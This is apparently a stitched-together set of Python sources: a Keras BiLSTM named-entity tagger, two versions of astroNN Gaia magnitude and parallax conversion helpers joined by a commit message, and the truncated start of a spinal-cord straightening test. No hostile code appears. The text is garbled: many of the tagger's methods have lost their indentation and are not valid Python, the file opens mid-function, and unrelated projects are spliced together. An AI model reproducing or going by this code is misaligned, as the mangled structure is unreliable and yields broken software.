lTmp=[]
for fname in lFName:
f=open(fname,encoding='utf-8')
x=[]
for l in f:
l = l.strip()
if l[:3] == '# ':continue # comments
if l =='EOS':
if x!=[]:
lTmp.append(x)
x=[]
else:
try:
la=l.split('\t')
b1=la[-1]
except ValueError:
print('cannot find value and label in: %s'%(l))
sys.exit(1)
x.append((la[0],b1))
if x != []:
lTmp.append(x)
f.close()
lX = []
lY = []
for sample in lTmp:
lX.append(list(map(lambda xy:xy[0],sample)))
lY.append(list(map(lambda xy:xy[1],sample)))
del lTmp
return lX,lY
def load_data_for_testing_Multitype(self,lFName):
"""
load data as training data (x,y)
nbClasses must be known!
loadModel first!
"""
lTmp=[]
for fname in lFName:
f=open(fname,encoding='utf-8')
x=[]
for l in f:
l = l.strip()
if l[:3] == '# ':continue # comments
if l =='EOS':
if x!=[]:
lTmp.append(x)
x=[]
else:
try:
la=l.split('\t')
b1=la[-1].split('_')[0]
b2=la[-1].split('_')[1]
except ValueError:
print('ml:cannot find value and label in: %s'%(l))
sys.exit()
assert len(la) != 0
x.append((la[0],(b1,b2)))
if x != []:
lTmp.append(x)
f.close()
lX = []
lY = []
for sample in lTmp:
lX.append(list(map(lambda xy:xy[0],sample)))
lY.append(list(map(lambda xy:xy[1],sample)))
del lTmp
return lX,lY
    def storeModel(self, model, aux):
        """
        store model and auxillary data (transformer)

        NOTE(review): the `aux` parameter is unused; all auxiliary state is
        read from self instead.
        """
        # Keras network -> <dirName>/<sModelName>.hd5
        model.save('%s/%s.hd5' % (self.dirName, self.sModelName))
        print('model dumped in %s/%s.hd5' % (self.dirName, self.sModelName))
        # everything needed at prediction time besides the network itself
        # (multitype flag, ngram config, padding length, class count, tag
        # mapping, fitted vectorizer) -> gzipped pickle <dirName>/<sModelName>.aux.pkl
        pickle.dump((self.bMultiType, self.maxngram, self.max_features, self.max_sentence_len, self.nbClasses, self.tag_vector, self.node_transformer), gzip.open('%s/%s.%s' % (self.dirName, self.sModelName, self.sAux), 'wb'))
        print('aux data dumped in %s/%s.%s' % (self.dirName, self.sModelName, self.sAux))
def loadModels(self):
"""
load models and aux data
"""
self.model = load_model(os.path.join(self.dirName,self.sModelName+'.hd5'),custom_objects={"AttentionDecoder": AttentionDecoder})
print('model loaded: %s/%s.hd5' % (self.dirName,self.sModelName))
try:
self.bMultiType,self.maxngram,self.max_features,self.max_sentence_len, self.nbClasses,self.tag_vector , self.node_transformer = pickle.load(gzip.open('%s/%s.%s'%(self.dirName,self.sModelName,self.sAux),'r'))
except:
self.maxngram,self.max_features,self.max_sentence_len, self.nbClasses,self.tag_vector , self.node_transformer = pickle.load(gzip.open('%s/%s.%s'%(self.dirName,self.sModelName,self.sAux),'r'))
self.bMultiType = False
print('aux data loaded: %s/%s.%s' % (self.dirName,self.sModelName,self.sAux))
print("ngram: %s\tmaxfea=%s\tpadding=%s\tnbclasses=%s" % (self.maxngram,self.max_features,self.max_sentence_len, self.nbClasses))
print("multitype model:%s"%(self.bMultiType))
    def training(self, traindata):
        """Fit the vectorizer and train a Masking->BiLSTM->softmax tagger.

        traindata is the (lX, lY) pair produced by load_data().
        Returns (model, auxdata) ready for storeModel().
        """
        train_X, _ = traindata  # self.load_data(self.lTrain)
        self.initTransformeur()
        # fit the char-ngram vectorizer on the flat token list of all sentences
        fX = [item for sublist in train_X for item in sublist]
        self.node_transformer.fit(fX)
        lX, lY = self.prepareTensor(traindata)
        model = Sequential()
        reg = L1L2(l1=0.001, l2=0.0)
        # mask the all-zero padding vectors appended by prepareTensor
        model.add(Masking(mask_value=0., input_shape=(self.max_sentence_len, self.max_features)))
        model.add(Bidirectional(LSTM(self.hiddenSize, return_sequences=True, bias_regularizer=reg)))
        model.add(Dropout(0.5))
        if self.bAttentionLayer:
            model.add(AttentionDecoder(self.max_sentence_len, self.nbClasses))
        else:
            # per-timestep class distribution over nbClasses tags
            model.add(TimeDistributed(Dense(self.nbClasses, activation='softmax')))
        # keras.optimizers.RMSprop(lr=0.001, rho=0.9, epsilon=1e-08, decay=0.0)
        model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['categorical_accuracy'])
        print(model.summary())
        _ = model.fit(lX, lY, epochs=self.nbEpochs, batch_size=self.batch_size, verbose=1, validation_split=0.33, shuffle=True)
        del lX, lY
        auxdata = self.max_features, self.max_sentence_len, self.nbClasses, self.tag_vector, self.node_transformer
        return model, auxdata
    def training_multitype(self, traindata):
        """Train the two-headed (BIES + label) BiLSTM with the functional API.

        traindata is the (lX, lY) pair produced by load_data_Multitype().
        Returns (model, auxdata) ready for storeModel().
        """
        train_X, _ = traindata  # self.load_data(self.lTrain)
        self.initTransformeur()
        # fit the char-ngram vectorizer on the flat token list of all sentences
        fX = [item for sublist in train_X for item in sublist]
        self.node_transformer.fit(fX)
        lX, (lY, lY2) = self.prepareTensor_multitype(traindata)
        inputs = Input(shape=(self.max_sentence_len, self.max_features))
        # mask zero padding, shared BiLSTM trunk, one softmax head per tag stream
        x = Masking(mask_value=0)(inputs)
        x = Bidirectional(LSTM(self.hiddenSize, return_sequences=True))(x)
        x = Dropout(0.5)(x)
        out1 = TimeDistributed(Dense(self.nbClasses, activation='softmax'), name='BIES')(x)
        out2 = TimeDistributed(Dense(self.nbClasses, activation='softmax'), name='Label')(x)
        # NOTE(review): input=/output= are the legacy Keras 1 keyword names
        model = Model(input=inputs, output=[out1, out2])
        model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['categorical_accuracy'])
        print(model.summary())
        _ = model.fit(lX, [lY, lY2], epochs=self.nbEpochs, batch_size=self.batch_size, verbose=1, validation_split=0.33, shuffle=True)
        del lX, lY
        auxdata = self.max_features, self.max_sentence_len, self.nbClasses, self.tag_vector, self.node_transformer
        return model, auxdata
def prepareTensor_multitype(self,annotated):
lx,ly = annotated
lX = list()
lY1= list()
lY2= list()
# = np.array()
for x,y in zip(lx,ly):
words = self.node_transformer.transform(x)
wordsvec = []
elem_tags1 = []
elem_tags2 = []
for ix,ss in enumerate(words):
wordsvec.append(ss)
elem_tags1.append(list(self.tag_vector[y[ix][0]]))
elem_tags2.append(list(self.tag_vector[y[ix][1]]))
nil_X = np.zeros(self.max_features)
nil_Y = np.array(self.tag_vector['NIL'])
pad_length = self.max_sentence_len - len(wordsvec)
lX.append( wordsvec +((pad_length)*[nil_X]) )
lY1.append( elem_tags1 + ((pad_length)*[nil_Y]) )
lY2.append( elem_tags2 + ((pad_length)*[nil_Y]) )
del lx
del ly
lX=np.array(lX)
lY1=np.array(lY1)
lY2=np.array(lY2)
return lX,(lY1,lY2)
def prepareTensor(self,annotated):
lx,ly = annotated
lX = list()
lY= list()
# = np.array()
for x,y in zip(lx,ly):
words = self.node_transformer.transform(x)
wordsvec = []
elem_tags = []
for ix,ss in enumerate(words):
wordsvec.append(ss)
elem_tags.append(list(self.tag_vector[y[ix]]))
nil_X = np.zeros(self.max_features)
nil_Y = np.array(self.tag_vector['NIL'])
pad_length = self.max_sentence_len - len(wordsvec)
lX.append( wordsvec +((pad_length)*[nil_X]) )
lY.append( elem_tags + ((pad_length)*[nil_Y]) )
del lx
del ly
lX=np.array(lX)
lY=np.array(lY)
return lX,lY
    def testModel(self, testdata):
        """Evaluate the loaded model on labelled data.

        Prints the Keras evaluation metrics, then for each sentence the
        tokens with their predicted (tag, confidence) pairs.
        """
        lX, lY = self.prepareTensor(testdata)
        scores = self.model.evaluate(lX, lY, verbose=True)
        print(list(zip(self.model.metrics_names, scores)))
        test_x, _ = testdata
        y_pred = self.model.predict(lX)
        for i, _ in enumerate(lX):
            pred_seq = y_pred[i]
            pred_tags = []
            for class_prs in pred_seq:
                # argmax -> one-hot -> tag string via the reverse tag_vector map
                class_vec = np.zeros(self.nbClasses, dtype=np.int32)
                class_vec[np.argmax(class_prs)] = 1
                if tuple(class_vec.tolist()) in self.tag_vector:
                    pred_tags.append((self.tag_vector[tuple(class_vec.tolist())], class_prs[np.argmax(class_prs)]))
            # truncate padded timesteps to the real sentence length
            print(test_x[i], pred_tags[:len(test_x[i])])
    def testModel_Multitype(self, testdata):
        """Evaluate the two-headed model on labelled data.

        Prints the Keras evaluation metrics, then for each sentence the
        predicted (tag, confidence) pairs of both output streams.
        """
        lX, (lY, lY2) = self.prepareTensor_multitype(testdata)
        scores = self.model.evaluate(lX, [lY, lY2], verbose=True)
        print(list(zip(self.model.metrics_names, scores)))
        test_x, _ = testdata
        y_pred1, y_pred2 = self.model.predict(lX)
        for i, _ in enumerate(lX):
            for pred_seq in [y_pred1[i], y_pred2[i]]:
                pred_tags = []
                for class_prs in pred_seq:
                    # argmax -> one-hot -> tag string via the reverse tag_vector map
                    class_vec = np.zeros(self.nbClasses, dtype=np.int32)
                    class_vec[np.argmax(class_prs)] = 1
                    if tuple(class_vec.tolist()) in self.tag_vector:
                        pred_tags.append((self.tag_vector[tuple(class_vec.tolist())], class_prs[np.argmax(class_prs)]))
                # truncate padded timesteps to the real sentence length
                print(test_x[i], pred_tags[:len(test_x[i])])
def prepareOutput_multitype(self,lToken,lLTags):
"""
format final output with MultiType
first level: BIES segmentation
remaining levels: label
assumption: no contradiction between layers
"""
chunk=[]
lChunk=[]
curTag=None
for itok,tok in enumerate(lToken):
# print(tok,lLTags[0][itok],lLTags[1][itok])
BIES,_ = lLTags[0][itok]
offset = itok
tag,score2 = lLTags[1][itok]
if tag != curTag:
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score2)]
elif BIES == 'B':
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score2)]
elif BIES in ['I','E']:
chunk.append((offset,tok,score2))
elif BIES == 'S':
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score2)]
if chunk !=[]:
lChunk.append((chunk,tag))
lRes=[]
for (lList,label) in lChunk:
# tok = " ".join(map(lambda x,tok,y: tok,lList))
tok = " ".join(x[1] for x in lList)
toffset = min(x[0] for x in lList),max(x[0] for x in lList)
lScore = (x[2] for x in lList)
# print toffset,tok,label,lScore
lRes.append((toffset,tok,label,list(lScore)))
return lRes
def prepareOutput(self,lToken, lTags):
"""
format final output
"""
chunk=[]
lChunk=[]
curTag=None
for offset,(tok, (tag,score)) in enumerate(list(zip(lToken,lTags))):
# print(tok.encode('utf-8'), tag)
BIES,tag = tag.split('_')
if tag != curTag:
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score)]
elif BIES == 'B':
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score)]
elif BIES in ['I','E']:
chunk.append((offset,tok,score))
elif BIES == 'S':
if chunk !=[]:
lChunk.append((chunk,curTag))
curTag=tag
chunk= [(offset,tok,score)]
if chunk !=[]:
lChunk.append((chunk,tag))
lRes=[]
for (lList,label) in lChunk:
tok = " ".join(x[1] for x in lList)
toffset = min(x[0] for x in lList),max(x[0] for x in lList)
lScore = (x[2] for x in lList)
# tok = " ".join(map(lambda x,tok,y: tok,lList))
# toffset = (min(map(lambda offset,x,y: offset,lList)),max(map(lambda offset,x,y: offset,lList)))
# lScore = (map(lambda offset,_,score: score,lList))
lRes.append((toffset,tok,label,list(lScore)))
return lRes
    def predict_multiptype(self, lsent):
        """Tag a list of (unicode) sentences with the multi-type model.

        NOTE(review): 'multiptype' is a typo for 'multitype', kept because
        run() calls the method under this name.
        Sentences longer than max_sentence_len are skipped with a warning.
        Returns one prepareOutput_multitype() chunk list per processed sentence.
        """
        lRes = []
        for mysent in lsent:
            if len(mysent.split()) > self.max_sentence_len:
                print('max sent length: %s' % self.max_sentence_len)
                continue
            # vectorize the whitespace-split tokens, then right-pad with zeros
            allwords = self.node_transformer.transform(mysent.split())
            wordsvec = []
            for w in allwords:
                wordsvec.append(w)
            lX = list()
            nil_X = np.zeros(self.max_features)
            pad_length = self.max_sentence_len - len(wordsvec)
            lX.append(wordsvec + ((pad_length) * [nil_X]))
            lX = np.array(lX)
            # two output heads: BIES stream and label stream
            y_pred1, y_pred2 = self.model.predict(lX)
            for i, _ in enumerate(lX):
                l_multi_type_results = []
                for pred_seq in [y_pred1[i], y_pred2[i]]:
                    pred_tags = []
                    pad_length = self.max_sentence_len - len(allwords)
                    for class_prs in pred_seq:
                        # argmax -> one-hot -> tag via the reverse tag_vector map
                        class_vec = np.zeros(self.nbClasses, dtype=np.int32)
                        class_vec[np.argmax(class_prs)] = 1
                        if tuple(class_vec.tolist()) in self.tag_vector:
                            pred_tags.append((self.tag_vector[tuple(class_vec.tolist())], class_prs[np.argmax(class_prs)]))
                    # drop the padding positions
                    l_multi_type_results.append(pred_tags[:len(allwords)])
                print(l_multi_type_results)
                lRes.append(self.prepareOutput_multitype(mysent.split(), l_multi_type_results))
        return lRes
    def predict(self, lsent):
        """Tag a list of (unicode) sentences with the single-label model.

        Sentences longer than max_sentence_len are skipped with a warning.
        Returns one prepareOutput() chunk list per processed sentence.
        """
        lRes = []
        for mysent in lsent:
            if len(mysent.split()) > self.max_sentence_len:
                print('max sent length: %s' % self.max_sentence_len)
                continue
            # vectorize the whitespace-split tokens, then right-pad with zeros
            allwords = self.node_transformer.transform(mysent.split())
            wordsvec = []
            for w in allwords:
                wordsvec.append(w)
            lX = list()
            nil_X = np.zeros(self.max_features)
            pad_length = self.max_sentence_len - len(wordsvec)
            lX.append(wordsvec + ((pad_length) * [nil_X]))
            lX = np.array(lX)
            y_pred = self.model.predict(lX)
            for i, _ in enumerate(lX):
                pred_seq = y_pred[i]
                pred_tags = []
                pad_length = self.max_sentence_len - len(allwords)
                for class_prs in pred_seq:
                    # argmax -> one-hot -> tag via the reverse tag_vector map
                    class_vec = np.zeros(self.nbClasses, dtype=np.int32)
                    class_vec[np.argmax(class_prs)] = 1
                    if tuple(class_vec.tolist()) in self.tag_vector:
                        pred_tags.append((self.tag_vector[tuple(class_vec.tolist())], class_prs[np.argmax(class_prs)]))
                # drop the padding positions before chunking
                lRes.append(self.prepareOutput(mysent.split(), pred_tags[:len(allwords)]))
        return lRes
    def gridSearch(self):
        """
        perform grid search training
        assume epochs,ngram, nbfeatures as N,N
        assume testing data for cross valid
        """
        # NOTE(review): unimplemented stub — run() calls this when
        # bGridSearch is set and it currently does nothing (returns None).
    def run(self):
        """Dispatch on the mode flags set by setParams(): grid search,
        training (single- or multi-type), testing, and/or one-shot prediction.
        """
        if self.bGridSearch:
            self.gridSearch()
        if self.bMultiType and self.bTraining:
            lX, lY = self.load_data_Multitype(self.lTrain)
            print(lY)
            model, other = self.training_multitype((lX, lY))
            # store
            self.storeModel(model, other)
            del lX, lY
            del self.node_transformer
            del model
        if self.bTraining and not self.bMultiType:
            lX, lY = self.load_data(self.lTrain)
            model, other = self.training((lX, lY))
            # store
            self.storeModel(model, other)
            del lX, lY
            del self.node_transformer
            del model
        if self.bTesting:
            self.loadModels()
            if self.bMultiType:
                lX, lY = self.load_data_for_testing_Multitype(self.lTest)
                res = self.testModel_Multitype((lX, lY))
            else:
                lX, lY = self.load_data_for_testing(self.lTest)
                res = self.testModel((lX, lY))
        if self.bPredict:
            # input format: the single string given via --run
            self.loadModels()
            lsent = [self._sent]
            print(lsent)
            if self.bMultiType:
                lres = self.predict_multiptype(lsent)
            else:
                lres = self.predict(lsent)
            for r in lres:
                print(r)
if __name__ == '__main__':
    # command-line entry point: build the component, declare its options,
    # parse argv, copy the options onto the component and run it
    cmp = DeepTagger()
    cmp.parser = OptionParser(usage="", version="0.1")
    cmp.parser.description = "BiLSTM approach for NER"
    cmp.parser.add_option("--name", dest="name", action="store", type="string", help="model name")
    cmp.parser.add_option("--dir", dest="dirname", action="store", type="string", help="directory to store model")
    cmp.parser.add_option("--training", dest="training", action="append", type="string", help="training data")
    cmp.parser.add_option("--ml", dest="multitype", action="store_true", default=False, help="multi type version")
    cmp.parser.add_option("--hidden", dest="hidden", action="store", type="int", help="hidden layer dimension")
    cmp.parser.add_option("--batch", dest="batchSize", action="store", type="int", help="batch size")
    cmp.parser.add_option("--epochs", dest="nbEpochs", action="store", type="int", help="nb epochs for training")
    cmp.parser.add_option("--ngram", dest="ngram", action="store", type="int", help="ngram size")
    cmp.parser.add_option("--nbfeatures", dest="nbfeatures", action="store", type="int", help="nb features")
    cmp.parser.add_option("--testing", dest="testing", action="append", type="string", help="test data")
    cmp.parser.add_option("--run", dest="predict", action="store", type="string", help="string to be categorized")
    cmp.parser.add_option("--att", dest="attention", action="store_true", default=False, help="add attention layer")
    (options, args) = cmp.parser.parse_args()
    #Now we are back to the normal programmatic mode, we set the component parameters
    cmp.setParams(options)
    #This component is quite special since it does not take one XML as input but rather a series of files.
    #doc = cmp.loadDom()
    doc = cmp.run()
|
# ---------------------------------------------------------#
# astroNN.gaia.gaia_shared: shared functions for apogee
# ---------------------------------------------------------#
import os
import numpy as np
from astropy import units as u
def gaia_env():
    """
    NAME:
        gaia_env
    PURPOSE:
        get Gaia environment variable
    INPUT:
    OUTPUT:
        (path) value of GAIA_TOOLS_DATA, or None if unset
    HISTORY:
        2017-Oct-26 - Written - Henry Leung (University of Toronto)
    """
    # imported lazily to avoid a circular import at module load time
    from astroNN import ENVVAR_WARN_FLAG
    _GAIA = os.getenv('GAIA_TOOLS_DATA')
    # warn on every call when the variable is unset, unless warnings are disabled
    if _GAIA is None and ENVVAR_WARN_FLAG is True:
        print("WARNING! Gaia enviroment variable GAIA_TOOLS_DATA not set")
    return _GAIA
def gaia_default_dr(dr=None):
    """
    NAME:
        gaia_default_dr
    PURPOSE:
        fall back to the default Gaia data release when none is given
    INPUT:
        dr (int): GAIA DR, example dr=1
    OUTPUT:
        dr (int): GAIA DR, example dr=1
    HISTORY:
        2017-Oct-26 - Written - Henry Leung (University of Toronto)
    """
    if dr is not None:
        return dr
    dr = 1
    print('dr is not provided, using default dr={}'.format(dr))
    return dr
def mag_to_fakemag(mag, parallax, parallax_err=None):
    """
    NAME:
        mag_to_fakemag
    PURPOSE:
        To convert apparent magnitude to astroNN's fake magnitude
    INPUT:
        mag (float, ndarray): apparent magnitude
        parallax (float, ndarray): parallax in mas
        parallax_err (float, ndarray): parallax err in mas
    OUTPUT:
        fakemag (float, ndarray)
        (conditional) fakemag_err (float, ndarray)
    HISTORY:
        2017-Oct-14 - Written - Henry Leung (University of Toronto)
    """
    # Check unit if available
    if isinstance(parallax, u.quantity.Quantity):
        if parallax.unit != u.mas:
            # BUGFIX: Quantity.to() returns a NEW quantity (it is not
            # in-place); the converted value must be assigned back,
            # otherwise the original unit was silently kept.
            parallax = parallax.to(u.mas)
            print(
                'Please be advised that astroNN fakemag function expects mas, astroNN has corrected the unit according'
                ' to astropy unit framework')
        # Take the value as we cant apply log10 to astropy unit
        parallax = parallax.value
    else:
        print('Please be advised that astroNN fakemag is parallax(mas) * 10 ** (0.2 * mag)')
    fakemag = parallax * (10 ** (0.2 * mag))
    if parallax_err is None:
        return fakemag
    # propagate the relative parallax error onto fakemag
    fakemag_err = np.abs((parallax_err / parallax) * fakemag)
    return fakemag, fakemag_err
def mag_to_absmag(mag, parallax, parallax_err=None):
    """
    NAME:
        mag_to_absmag
    PURPOSE:
        To convert apparent magnitude to absolute magnitude
    INPUT:
        mag (float, ndarray): magnitude
        parallax (float, ndarray): parallax in arcsecond
        parallax_err (float, ndarray): parallax err in arcsecond
    OUTPUT:
        absmag (float, ndarray)
        (conditional) absmag_err (float, ndarray)
    HISTORY:
        2017-Oct-14 - Written - Henry Leung (University of Toronto)
    """
    # Check unit if available
    if isinstance(parallax, u.quantity.Quantity):
        if parallax.unit != u.arcsec:
            # BUGFIX: Quantity.to() returns a NEW quantity; assign the
            # converted value back, otherwise the original unit was kept.
            parallax = parallax.to(u.arcsec)
            print('Please be advised that astroNN mag_to_absmag() expects arcsecond, astroNN has corrected the unit '
                  'according to astropy unit framework')
        # Take the value as we cant apply log10 to astropy unit
        parallax = parallax.value
    else:
        print('Please be advised that astroNN mag_to_absmag expects parallax in (arcsecond)')
    absmag = mag + 5 * (np.log10(parallax) + 1)
    if parallax_err is None:
        return absmag
    # error propagation of d/dp [5*log10(p)] = 5 / (p * ln 10)
    absmag_err = 5 * np.abs(parallax_err / (parallax * np.log(10)))
    return absmag, absmag_err
def absmag_to_pc(absmag, mag):
    """
    NAME:
        absmag_to_pc
    PURPOSE:
        To convert absolute magnitude to parsec
    INPUT:
        mag (float, ndarray): magnitude
        absmag (float, ndarray): absolute magnitude
    OUTPUT:
        parsec (float, ndarray with astropy unit) in pc
    HISTORY:
        2017-Nov-16 - Written - Henry Leung (University of Toronto)
    """
    # inverted distance modulus: d[pc] = 10 ** ((mag - absmag)/5 + 1)
    return (1 / (10 ** (((absmag - mag) / 5) - 1))) * u.parsec
def fakemag_to_absmag(fakemag):
    """
    NAME:
        fakemag_to_absmag
    PURPOSE:
        To convert fakemag to absmag
    INPUT:
        fakemag (float, ndarray): fakemag
    OUTPUT:
        absmag (float, ndarray)
    HISTORY:
        2018-Jan-31 - Written - Henry Leung (University of Toronto)
    """
    log_fakemag = np.log10(fakemag)
    return 5 * (log_fakemag - 2)
def absmag_to_fakemag(absmag):
    """
    NAME:
        absmag_to_fakemag
    PURPOSE:
        To convert absmag to fakemag
    INPUT:
        absmag (float, ndarray): absolute magnitude
    OUTPUT:
        fakemag (float, ndarray)
    HISTORY:
        2018-Jan-31 - Written - Henry Leung (University of Toronto)
    """
    # inverse of fakemag_to_absmag
    exponent = 0.2 * absmag + 2
    return 10 ** exponent
def fakemag_to_pc(fakemag, mag, fakemag_err=None):
    """
    NAME:
        fakemag_to_pc
    PURPOSE:
        To convert fakemag to parsec
    INPUT:
        fakemag (float, ndarray): fakemag
        mag (float, ndarray): magnitude
        fakemag_err (float, ndarray): fakemag err
    OUTPUT:
        parsec (float, ndarray with astropy unit) in pc
        (conditional) parsec err (float, ndarray with astropy unit) in pc
    HISTORY:
        2018-Jan-31 - Written - Henry Leung (University of Toronto)
    """
    pc = 1000 * (10 ** (0.2 * mag)) / fakemag * u.parsec
    if fakemag_err is None:
        return pc
    # BUGFIX: `pc` already carries the parsec unit, so the old
    # `... * pc * u.parsec` produced parsec**2; scale the bare value and
    # reattach the unit instead.
    pc_err = (fakemag_err / fakemag) * pc.value * u.parsec
    return pc, pc_err
wrong fake_to_pc error unit
# ---------------------------------------------------------#
# astroNN.gaia.gaia_shared: shared functions for apogee
# ---------------------------------------------------------#
import os
import numpy as np
from astropy import units as u
def gaia_env():
    """
    NAME:
        gaia_env
    PURPOSE:
        get Gaia environment variable
    INPUT:
    OUTPUT:
        (path) value of GAIA_TOOLS_DATA, or None if unset
    HISTORY:
        2017-Oct-26 - Written - Henry Leung (University of Toronto)
    """
    # imported lazily to avoid a circular import at module load time
    from astroNN import ENVVAR_WARN_FLAG
    _GAIA = os.getenv('GAIA_TOOLS_DATA')
    # warn on every call when the variable is unset, unless warnings are disabled
    if _GAIA is None and ENVVAR_WARN_FLAG is True:
        print("WARNING! Gaia enviroment variable GAIA_TOOLS_DATA not set")
    return _GAIA
def gaia_default_dr(dr=None):
    """
    NAME:
        gaia_default_dr
    PURPOSE:
        fall back to the default Gaia data release when none is given
    INPUT:
        dr (int): GAIA DR, example dr=1
    OUTPUT:
        dr (int): GAIA DR, example dr=1
    HISTORY:
        2017-Oct-26 - Written - Henry Leung (University of Toronto)
    """
    if dr is not None:
        return dr
    dr = 1
    print('dr is not provided, using default dr={}'.format(dr))
    return dr
def mag_to_fakemag(mag, parallax, parallax_err=None):
    """
    NAME:
        mag_to_fakemag
    PURPOSE:
        To convert apparent magnitude to astroNN's fake magnitude
    INPUT:
        mag (float, ndarray): apparent magnitude
        parallax (float, ndarray): parallax in mas
        parallax_err (float, ndarray): parallax err in mas
    OUTPUT:
        fakemag (float, ndarray)
        (conditional) fakemag_err (float, ndarray)
    HISTORY:
        2017-Oct-14 - Written - Henry Leung (University of Toronto)
    """
    # Check unit if available
    if isinstance(parallax, u.quantity.Quantity):
        if parallax.unit != u.mas:
            # BUGFIX: Quantity.to() returns a NEW quantity (it is not
            # in-place); the converted value must be assigned back,
            # otherwise the original unit was silently kept.
            parallax = parallax.to(u.mas)
            print(
                'Please be advised that astroNN fakemag function expects mas, astroNN has corrected the unit according'
                ' to astropy unit framework')
        # Take the value as we cant apply log10 to astropy unit
        parallax = parallax.value
    else:
        print('Please be advised that astroNN fakemag is parallax(mas) * 10 ** (0.2 * mag)')
    fakemag = parallax * (10 ** (0.2 * mag))
    if parallax_err is None:
        return fakemag
    # propagate the relative parallax error onto fakemag
    fakemag_err = np.abs((parallax_err / parallax) * fakemag)
    return fakemag, fakemag_err
def mag_to_absmag(mag, parallax, parallax_err=None):
    """
    NAME:
        mag_to_absmag
    PURPOSE:
        To convert apparent magnitude to absolute magnitude
    INPUT:
        mag (float, ndarray): magnitude
        parallax (float, ndarray): parallax in arcsecond
        parallax_err (float, ndarray): parallax err in arcsecond
    OUTPUT:
        absmag (float, ndarray)
        (conditional) absmag_err (float, ndarray)
    HISTORY:
        2017-Oct-14 - Written - Henry Leung (University of Toronto)
    """
    # Check unit if available
    if isinstance(parallax, u.quantity.Quantity):
        if parallax.unit != u.arcsec:
            # BUGFIX: Quantity.to() returns a NEW quantity; assign the
            # converted value back, otherwise the original unit was kept.
            parallax = parallax.to(u.arcsec)
            print('Please be advised that astroNN mag_to_absmag() expects arcsecond, astroNN has corrected the unit '
                  'according to astropy unit framework')
        # Take the value as we cant apply log10 to astropy unit
        parallax = parallax.value
    else:
        print('Please be advised that astroNN mag_to_absmag expects parallax in (arcsecond)')
    absmag = mag + 5 * (np.log10(parallax) + 1)
    if parallax_err is None:
        return absmag
    # error propagation of d/dp [5*log10(p)] = 5 / (p * ln 10)
    absmag_err = 5 * np.abs(parallax_err / (parallax * np.log(10)))
    return absmag, absmag_err
def absmag_to_pc(absmag, mag):
    """
    NAME:
        absmag_to_pc
    PURPOSE:
        To convert absolute magnitude to parsec
    INPUT:
        mag (float, ndarray): magnitude
        absmag (float, ndarray): absolute magnitude
    OUTPUT:
        parsec (float, ndarray with astropy unit) in pc
    HISTORY:
        2017-Nov-16 - Written - Henry Leung (University of Toronto)
    """
    # inverted distance modulus: d[pc] = 10 ** ((mag - absmag)/5 + 1)
    return (1 / (10 ** (((absmag - mag) / 5) - 1))) * u.parsec
def fakemag_to_absmag(fakemag):
    """
    NAME:
        fakemag_to_absmag
    PURPOSE:
        To convert fakemag to absmag
    INPUT:
        fakemag (float, ndarray): fakemag
    OUTPUT:
        absmag (float, ndarray)
    HISTORY:
        2018-Jan-31 - Written - Henry Leung (University of Toronto)
    """
    log_fakemag = np.log10(fakemag)
    return 5 * (log_fakemag - 2)
def absmag_to_fakemag(absmag):
    """
    NAME:
        absmag_to_fakemag
    PURPOSE:
        To convert absmag to fakemag
    INPUT:
        absmag (float, ndarray): absolute magnitude
    OUTPUT:
        fakemag (float, ndarray)
    HISTORY:
        2018-Jan-31 - Written - Henry Leung (University of Toronto)
    """
    # inverse of fakemag_to_absmag
    exponent = 0.2 * absmag + 2
    return 10 ** exponent
def fakemag_to_pc(fakemag, mag, fakemag_err=None):
    """
    NAME:
        fakemag_to_pc
    PURPOSE:
        To convert fakemag to parsec
    INPUT:
        fakemag (float, ndarray): fakemag
        mag (float, ndarray): magnitude
        fakemag_err (float, ndarray): fakemag err
    OUTPUT:
        parsec (float, ndarray with astropy unit) in pc
    HISTORY:
        2018-Jan-31 - Written - Henry Leung (University of Toronto)
    """
    if fakemag_err is None:
        return 1000 * (10 ** (0.2 * mag)) / fakemag * u.parsec
    else:
        pc = 1000 * (10 ** (0.2 * mag)) / fakemag * u.parsec
        # pc already carries the parsec unit: scale the bare .value and
        # reattach the unit so pc_err stays in parsec (not parsec**2)
        pc_err = (fakemag_err / fakemag) * pc.value * u.parsec
        return pc, pc_err
|
#!/usr/bin/env python
#########################################################################################
#
# Test function for sct_sctraighten_spinalcord script
#
# replace the shell test script in sct 1.0
#
# ---------------------------------------------------------------------------------------
# Copyright (c) 2014 Polytechnique Montreal <www.neuro.polymtl.ca>
# Author: Augustin Roux
# modified: 2014/09/28
#
# About the license: see the file LICENSE.TXT
#########################################################################################
import sct_utils as sct
from msct_parser import Parser
import sct_straighten_spinalcord
from pandas import DataFrame
import os.path
def test(path_data='', parameters=''):
    """Integrity test for sct_straighten_spinalcord.

    Straightens the input spinal-cord image, extracts the accuracy metrics
    (maximum x-y error, MSE) from the command output and checks them against
    fixed thresholds, then round-trips the segmentation through the
    curve->straight and straight->curve warping fields and checks the Dice
    coefficient against the original segmentation.

    :param path_data: path to the folder containing the test data.
    :param parameters: arguments forwarded to sct_straighten_spinalcord
        (defaults to the bundled t2 test data set).
    :return: tuple (status, output, results) where status is 0 on success,
        99 when an integrity threshold is violated, 200 when input files are
        missing; output is the accumulated log text; results is a pandas
        DataFrame indexed by path_data.
    """
    if not parameters:
        parameters = '-i t2/t2.nii.gz -s t2/t2_seg.nii.gz -qc 0'
    parser = sct_straighten_spinalcord.get_parser()
    dict_param = parser.parse(parameters.split(), check_file_exist=False)
    dict_param_with_path = parser.add_path_to_file(dict_param, path_data, input_file=True)
    param_with_path = parser.dictionary_to_string(dict_param_with_path)
    # Check if input files exist
    if not (os.path.isfile(dict_param_with_path['-i']) and os.path.isfile(dict_param_with_path['-s'])):
        status = 200
        output = 'ERROR: the file(s) provided to test function do not exist in folder: ' + path_data
        return status, output, DataFrame(data={'status': status, 'output': output, 'mse': float('nan'), 'dist_max': float('nan')}, index=[path_data])
    # create output folder to deal with multithreading (i.e., we don't want to
    # have outputs from several subjects in the current directory)
    import time, random
    subject_folder = path_data.split('/')
    if subject_folder[-1] == '' and len(subject_folder) > 1:
        subject_folder = subject_folder[-2]
    else:
